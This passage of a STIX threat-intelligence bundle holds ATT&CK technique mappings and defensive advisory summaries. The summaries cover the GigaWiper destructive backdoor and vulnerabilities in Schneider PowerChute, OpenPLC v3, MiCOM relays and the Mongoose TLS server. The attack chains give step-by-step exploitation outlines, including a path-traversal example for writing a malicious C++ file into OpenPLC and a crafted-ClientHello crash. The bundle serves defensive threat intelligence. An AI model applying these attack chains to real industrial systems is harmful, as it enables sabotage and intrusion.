      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4db2dfeb-3b8c-5aa6-abae-348c7778109a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b66d0495-6be2-5e43-925c-894c167430c9",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f724cffd-c9a5-5c3d-8e89-886c67860dc8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b66d0495-6be2-5e43-925c-894c167430c9",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Encrypted for Impact",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1486",
          "url": "https://attack.mitre.org/techniques/T1486"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0fe3e56d-65ce-5806-9f17-71c9c96c6cd0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b66d0495-6be2-5e43-925c-894c167430c9",
      "target_ref": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Service Stop",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1489",
          "url": "https://attack.mitre.org/techniques/T1489"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--18225068-7807-55a6-97b4-ede2ebf6151a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b66d0495-6be2-5e43-925c-894c167430c9",
      "target_ref": "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b66d0495-6be2-5e43-925c-894c167430c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "GigaWiper: Multi-Payload Destructive Backdoor",
      "description": "## Overview\n\nSince October 2025, Microsoft Threat Intelligence has been tracking GigaWiper, a highly destructive Golang-based backdoor that consolidates multiple wiper and ransomware-like capabilities. This implant stands out for its modular design, merging code from previously distinct malware families such as a standalone physical disk wiper, a destructive component derived from Crucio ransomware that encrypts files with unrecoverable keys, and a multi-pass secure wiping logic reimagined from FlockWiper. GigaWiper establishes persistence via a scheduled task and a registry key, communicating with its command-and-control (C2) infrastructure over RabbitMQ and Redis. This consolidation into a single platform reflects an operational efficiency trend among threat actors, aiming to reduce deployment footprints while expanding destructive potential across targeted environments.\n\n## Attack Chain\n\n1. Initial execution of the GigaWiper backdoor implant on a compromised system.\n2. The implant checks for prior execution via the `HKCU\\SOFTWARE\\OneDrive\\Environment` registry key and creates a scheduled task named \"OneDrive Update\" for persistence, running every minute and at system startup.\n3. GigaWiper establishes command-and-control (C2) communication channels, utilizing RabbitMQ and Redis.\n4. Upon receiving a destructive command from the C2, GigaWiper enumerates physical disk drives using Windows Management Instrumentation (WMI) queries to identify targets.\n5. It proceeds to target non-Windows drives, removing their partition references via `DeviceIoControl` with `IOCTL_DISK_CREATE_DISK` to reinitialize partitioning metadata.\n6. The malware then overwrites the raw content of the identified drives in 0xA00000-sized chunks, filling the first byte with randomized data and the rest with zeros, effectively destroying data.\n7. In some variants, GigaWiper encrypts files using a mechanism derived from Crucio ransomware, where encryption keys are not saved, rendering data unrecoverable.\n8. Finally, it forces an immediate system reboot by invoking Windows shutdown functionality with restart and zero-delay options to finalize the destructive impact.\n\n## Impact\n\nGigaWiper's primary impact is severe data destruction and system unavailability. Observed since October 2025, it has been used to wipe compromised environments, rendering systems inoperable and data irrecoverable. The consolidation of multiple wiping and ransomware capabilities means that organizations face a multi-pronged attack that not only deletes files and partitions but also encrypts data without any recovery possibility. This leads to significant operational disruption, data loss, and substantial recovery costs across targeted organizations. While specific victim counts or sectors are not detailed, the nature of the threat indicates potential for widespread damage across any Windows-based enterprise environment.\n\n## Recommendation\n\n* Deploy the provided Sigma rules to your SIEM/EDR and tune them for your environment.\n* Enable Sysmon process-creation logging to capture `schtasks.exe` and `shutdown.exe` activity to activate the rules above.\n* Monitor for modifications to the `HKCU\\SOFTWARE\\OneDrive\\Environment` registry key by unfamiliar processes, leveraging `registry_set` logs.\n* Implement strong egress filtering to detect and block suspicious outbound connections, particularly those to unknown RabbitMQ or Redis endpoints.\n",
      "published": "2026-07-09T15:51:46Z",
      "labels": [
        "wiper",
        "destructive",
        "backdoor",
        "ransomware",
        "golang",
        "windows"
      ],
      "object_refs": [
        "indicator--566cfba6-30de-5c45-abe5-42e589cad817",
        "indicator--62b3012a-61e5-5172-bdb0-50ee00d4ada3",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--7ae20902-9541-5391-8598-d72c1b1ffdfd",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
        "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6",
        "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2026/07/09/gigawiper-anatomy-of-a-destructive-backdoor-assembled-from-multiple-malware/"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7aa91197-6893-5752-bdff-c1c753bf6911",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--41f915a9-622e-5d71-a92b-bf973de277f3",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1562",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3527d211-b128-5610-9291-93f674818a0f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--41f915a9-622e-5d71-a92b-bf973de277f3",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1110",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1110",
          "url": "https://attack.mitre.org/techniques/T1110"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8069c3c0-ea01-58ff-9722-4e87b4b1ea1e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--41f915a9-622e-5d71-a92b-bf973de277f3",
      "target_ref": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c87e7c1d-fdd0-59b9-873f-b00ae07cb25e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--41f915a9-622e-5d71-a92b-bf973de277f3",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--55bfa668-d02a-53a1-be0f-38356a7fc435",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--41f915a9-622e-5d71-a92b-bf973de277f3",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--41f915a9-622e-5d71-a92b-bf973de277f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Schneider Electric PowerChute Serial Shutdown",
      "description": "## Overview\n\nCISA has issued an advisory regarding multiple vulnerabilities affecting Schneider Electric PowerChute Serial Shutdown software, versions 1.4 and prior. These vulnerabilities, including CVE-2026-2399 (Path Traversal), CVE-2026-2404 (Improper Output Encoding), CVE-2026-2405 (Excessive Authentication Attempts), CVE-2026-2403 (Uncontrolled Resource Consumption), CVE-2026-2400 (Improper Input Validation), and CVE-2026-2401 (CRLF Injection and Sensitive Information in Log), pose significant risks. Successful exploitation could lead to critical system file overwrites, log data manipulation, unauthorized account access, denial-of-service, and sensitive information exposure. The affected software is deployed globally across critical infrastructure sectors such as Communications, Critical Manufacturing, Energy, Healthcare, Information Technology, and Transportation Systems. While no active exploitation has been reported, the potential impact on critical operations necessitates immediate attention from defenders.\n\n## Attack Chain\n\n1. An attacker gains adjacent network access to the host running Schneider Electric PowerChute Serial Shutdown (implied by CVSS AV:A).\n2. The attacker acquires high-privilege credentials for the PowerChute application (implied by CVSS PR:H).\n3. Leveraging CVE-2026-2399, the attacker crafts a malicious input string containing path traversal sequences (e.g., `../../`) targeting PowerChute's file handling functions.\n4. The crafted input is submitted through an authenticated interface, leading to the overwrite of critical system files or unauthorized file creation.\n5. Through CVE-2026-2404 and CVE-2026-2401, the attacker injects malformed data into a PowerChute input field to exploit improper output encoding or CRLF injection.\n6. This causes PowerChute to log the crafted data, potentially leading to log file poisoning, tampering, or injection of malicious content.\n7. Exploiting CVE-2026-2403 or CVE-2026-2400, the attacker triggers conditions that lead to uncontrolled resource consumption or malformed input processing, causing a denial-of-service (DoS) on the PowerChute application.\n8. The attacker attempts to reset user credentials by repeatedly triggering authentication attempts (CVE-2026-2405) or exfiltrates sensitive information exposed in manipulated log files (CVE-2026-2401).\n\n## Impact\n\nThe successful exploitation of these vulnerabilities could have severe consequences for organizations relying on Schneider Electric PowerChute Serial Shutdown. Attackers could gain unauthorized control over critical system files, leading to system instability, data corruption, or even complete system compromise. Log data manipulation could hinder forensic analysis and incident response efforts, while denial-of-service attacks could disrupt critical operations, particularly in sectors like Energy and Manufacturing where PowerChute manages UPS systems. Exposure of sensitive information could lead to further compromise or compliance violations. The vulnerabilities affect systems worldwide, making the potential for widespread disruption significant if not patched.\n\n## Recommendation\n\n* Immediately update Schneider Electric PowerChute Serial Shutdown to version 1.5 or later to address CVE-2026-2399, CVE-2026-2404, CVE-2026-2405, CVE-2026-2403, CVE-2026-2400, and CVE-2026-2401.\n* Review the Schneider Electric Security Handbook referenced in the advisory (https://download.schneider-electric.com/files?p_Doc_Ref=SPD_CCON-PCSSSH_EN) for specific hardening guidelines and mitigation strategies applicable to your environment.\n* Ensure proper network segmentation to limit adjacent network access to PowerChute Serial Shutdown installations, as specified by the CVSS vector (AV:A).\n* Implement strong authentication policies and monitor for excessive authentication attempts, which could indicate exploitation of CVE-2026-2405.\n",
      "published": "2026-07-09T15:56:37Z",
      "labels": [
        "ics",
        "ot",
        "vulnerability",
        "path-traversal",
        "crlf-injection",
        "dos",
        "log-tampering",
        "critical-infrastructure"
      ],
      "object_refs": [
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-190-02"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2399"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2404"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2405"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2403"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2400"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2401"
        },
        {
          "source_name": "reference",
          "url": "https://www.se.com/ww/en/download/document/SPD-PCSS_WIN_EN/"
        },
        {
          "source_name": "reference",
          "url": "https://www.se.com/ww/en/download/document/SPD-PCSS_LNX_EN/"
        },
        {
          "source_name": "reference",
          "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SPD_CCON-PCSSSH_EN"
        },
        {
          "source_name": "reference",
          "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2026-104-01.pdf"
        },
        {
          "source_name": "reference",
          "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=sevd-2026-104-01.json"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--71dcaf13-7dc3-5858-b56f-9db7ab854d12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ede67e6e-0709-529e-acd8-9dacb1468043",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3613e901-a0f9-56d6-bcf9-b3559bdf8f22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ede67e6e-0709-529e-acd8-9dacb1468043",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1952be4-93c2-5b21-9f60-87da56985803",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ede67e6e-0709-529e-acd8-9dacb1468043",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ede67e6e-0709-529e-acd8-9dacb1468043",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenPLC v3 Arbitrary File Write Leads to Native Code Execution (CVE-2026-14480)",
      "description": "## Overview\n\nOpenPLC v3 is affected by CVE-2026-14480, an authenticated arbitrary file write vulnerability (CWE-73) within its legacy web UI program-upload workflow. This critical flaw allows an authenticated attacker to manipulate the `prog_file` parameter, typically used for specifying a filename, to instead provide a path traversal sequence. The system fails to validate or restrict this path, enabling the attacker to write arbitrary files to any location writable by the OpenPLC webserver process. This arbitrary file write can be escalated to arbitrary native code execution; by injecting a malicious C++ file into the OpenPLC Runtime Core directory, an attacker can ensure their code is automatically compiled and executed as part of the normal OpenPLC program compilation process when an operator starts the runtime. This vulnerability poses a significant risk to critical infrastructure sectors including Critical Manufacturing, Energy, Transportation Systems, and Water and Wastewater, with deployments worldwide. OpenPLC v3 is now end-of-life and will not receive patches.\n\n## Attack Chain\n\n1. An authenticated attacker logs into the OpenPLC v3 web UI, typically using legitimate or compromised credentials.\n2. The attacker accesses the legacy program-upload workflow, which handles PLC program submissions.\n3. The attacker crafts a malicious HTTP request, sending a crafted `prog_file` parameter containing a path traversal sequence (e.g., `../../../OpenPLC_Runtime_Core/malicious.cpp`).\n4. Due to insufficient path validation, the OpenPLC webserver process writes the attacker-controlled malicious C++ file (e.g., `malicious.cpp`) to the specified arbitrary location within the OpenPLC Runtime Core directory.\n5. At a later point, a legitimate operator initiates a normal program compilation and runtime start operation within the OpenPLC environment.\n6. During this standard compilation process, the attacker's previously written `malicious.cpp` file is automatically included, compiled, and linked into the OpenPLC runtime binary.\n7. The newly compiled OpenPLC runtime binary, now containing the attacker's embedded code, is executed.\n8. This execution leads to arbitrary native code execution on the OpenPLC server, with the privileges of the OpenPLC runtime user, potentially compromising the control system.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14480 allows an authenticated attacker to achieve arbitrary native code execution as the OpenPLC runtime user. This grants the attacker significant control over the affected system, enabling them to disrupt operations, manipulate processes, or exfiltrate sensitive data. Given OpenPLC's deployment in critical infrastructure sectors such as Critical Manufacturing, Energy, Transportation Systems, and Water and Wastewater, the impact could range from operational disruption and safety hazards to widespread system compromise and economic damage. OpenPLC v3 being end-of-life means that affected organizations are left vulnerable unless they upgrade to v4.\n\n## Recommendation\n\n* Upgrade all OpenPLC v3 instances to OpenPLC v4 immediately, as recommended by OpenPLC, due to OpenPLC v3 being end-of-life and no longer receiving security updates for CVE-2026-14480.\n* Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet, as highlighted in the CISA recommendations.\n* Locate control system networks and remote devices behind firewalls and isolate them from business networks, as advised by CISA for CVE-2026-14480.\n* When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), and ensure VPNs are updated to the most current version available.\n",
      "published": "2026-07-09T15:57:54Z",
      "labels": [
        "ics",
        "scada",
        "vulnerability",
        "rce",
        "authenticated-rce",
        "file-write",
        "cwe-73"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-190-01"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-14480"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network Service Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1046",
          "url": "https://attack.mitre.org/techniques/T1046"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0080c44-db91-593c-91ec-f4e0b98948cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6be87eac-198f-5b42-a08d-b767d3038749",
      "target_ref": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b394de4a-62a4-54c3-b1a6-3d1ce83542f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6be87eac-198f-5b42-a08d-b767d3038749",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6be87eac-198f-5b42-a08d-b767d3038749",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Schneider Electric Easergy MiCOM Px40 Series Information Disclosure via Hard-coded Credentials (CVE-2026-4832)",
      "description": "## Overview\n\nSchneider Electric has identified a vulnerability, CVE-2026-4832, affecting its Easergy MiCOM Px40 Series protection relays. This flaw stems from the use of hard-coded credentials, exposing basic device identification information through the SNMP protocol. This vulnerability impacts various models including P14x (prior to B4A), P24x (prior to D3A), P34x, P44x, P54x, P64x, P74x, and P84x series, which are deployed worldwide in critical infrastructure sectors such as Critical Manufacturing, Energy, and Transportation Systems. An unauthenticated attacker can exploit this weakness by interrogating the SNMP port, potentially gaining insights into network topology and device specifics. The advisory, published on July 9, 2026, highlights the importance of immediate mitigation to prevent unauthorized information exposure.\n\n## Attack Chain\n\n1. An unauthenticated attacker gains network access to a Schneider Electric Easergy MiCOM Px40 Series device, typically by being on the same network segment or via compromised network infrastructure.\n2. The attacker targets the device's SNMP port (UDP 161) to initiate communication.\n3. The attacker sends SNMP Get or GetNext requests to the device.\n4. Due to the hard-coded credentials (CWE-798), the device responds to these unauthenticated requests or requests made with commonly known or easily guessable community strings.\n5. The device's SNMP agent discloses basic device identification information, such as system description, device name, and other configuration data.\n6. This information exposure can aid the attacker in further reconnaissance and potentially lead to more targeted attacks against the critical infrastructure systems.\n\n## Impact\n\nThe successful exploitation of CVE-2026-4832 leads to unauthorized exposure of basic device identification information. While not directly resulting in remote code execution or denial of service, this information disclosure provides attackers with valuable reconnaissance data about critical infrastructure assets. The Easergy MiCOM Px40 Series is widely deployed globally in Critical Manufacturing, Energy, and Transportation Systems sectors. Such details can be leveraged to map network topologies, identify specific device models and firmware versions, and plan more sophisticated attacks, increasing the risk to operational technology environments.\n\n## Recommendation\n\n* For Easergy MiCOM Px40 Series devices where SNMP functionality is not required, contact Schneider Electric's Customer Care Center to upgrade firmware to a version without SNMP functionality, addressing CVE-2026-4832.\n* If SNMP is required, ensure devices are only used within a protected network environment, isolated from business networks, as outlined in the CISA advisory.\n* Deploy firewalls to protect and separate control system networks from other networks to restrict access to SNMP ports of affected devices.\n* For any remote access to affected devices, implement secure Virtual Private Networks (VPNs) and ensure VPNs are updated to the most current versions, as suggested by the CISA advisory.\n",
      "published": "2026-07-09T15:59:04Z",
      "labels": [
        "ics",
        "ot",
        "scada",
        "vulnerability",
        "schneider-electric",
        "snmp",
        "cve-2026-4832",
        "information-disclosure"
      ],
      "object_refs": [
        "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-190-03"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4832"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f5821032-f330-5d41-a68e-e997c0e7d578",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9291a367-a679-5c84-b678-99930c1548c7",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9291a367-a679-5c84-b678-99930c1548c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-11404: Cesanta Mongoose TLS Out-of-Bounds Read Leading to Denial of Service",
      "description": "## Overview\n\nThe Cesanta Mongoose library, specifically versions prior to 7.22, is affected by a critical out-of-bounds read vulnerability, identified as CVE-2026-11404. This flaw resides within the `mg_tls_server_recv_hello()` function, a core component of its built-in TLS server (MG_TLS_BUILTIN). Attackers can exploit this by sending a single, specially crafted TLS ClientHello message. This malicious ClientHello contains an intentionally oversized `session_id_len` byte, which the vulnerable function uses as a buffer index without proper validation against the length of the received data. The consequence is an attempt to read memory beyond the allocated receive buffer, leading to a severe application crash. This vulnerability enables a remote, unauthenticated attacker to trigger a denial of service on any HTTPS, MQTTS, or WSS service built using the affected Mongoose library, disrupting critical services. This issue highlights the importance of input validation in network protocol implementations.\n\n## Attack Chain\n\n1. A remote, unauthenticated attacker initiates a TLS connection to a vulnerable Cesanta Mongoose service (e.g., HTTPS, MQTTS, WSS) that utilizes the MG_TLS_BUILTIN feature.\n2. The attacker sends a specially crafted TLS ClientHello message to the server as part of the TLS handshake.\n3. Within the ClientHello message, the attacker manipulates the `session_id_len` byte to contain an oversized, invalid value.\n4. The vulnerable `mg_tls_server_recv_hello()` function in Mongoose processes the ClientHello without adequately validating the `session_id_len` against the actual length of the received data.\n5. The function attempts to use the oversized `session_id_len` as a buffer index, resulting in an out-of-bounds read operation past the legitimate boundaries of the receive buffer.\n6. This memory access violation triggers a critical error, causing the Cesanta Mongoose application to crash.\n7. The application crash leads to a denial of service, rendering the affected HTTPS, MQTTS, or WSS service unavailable to legitimate users.\n\n## Impact\n\nThe successful exploitation of CVE-2026-11404 leads to a complete denial of service for any internet-facing service utilizing the affected Cesanta Mongoose library with MG_TLS_BUILTIN enabled. Services such as HTTPS, MQTTS, and WSS will crash, becoming unavailable to legitimate users. This can result in significant operational disruption, potential data loss (if not properly handled during the crash), and reputational damage for affected organizations. While the vulnerability is not described as leading to arbitrary code execution or data exfiltration, the ability for an unauthenticated attacker to reliably crash critical services poses a high risk.\n\n## Recommendation\n\n* Patch CVE-2026-11404 by upgrading Cesanta Mongoose to version 7.22 or later immediately.\n* Monitor affected services (HTTPS, MQTTS, WSS) for unexpected restarts or crashes, which could indicate attempted exploitation of this vulnerability.\n* Implement robust service availability monitoring and alerting for any prolonged outages of applications utilizing Cesanta Mongoose with MG_TLS_BUILTIN.\n",
      "published": "2026-07-09T16:18:10Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "tls",
        "webserver",
        "firmware"
      ],
      "object_refs": [
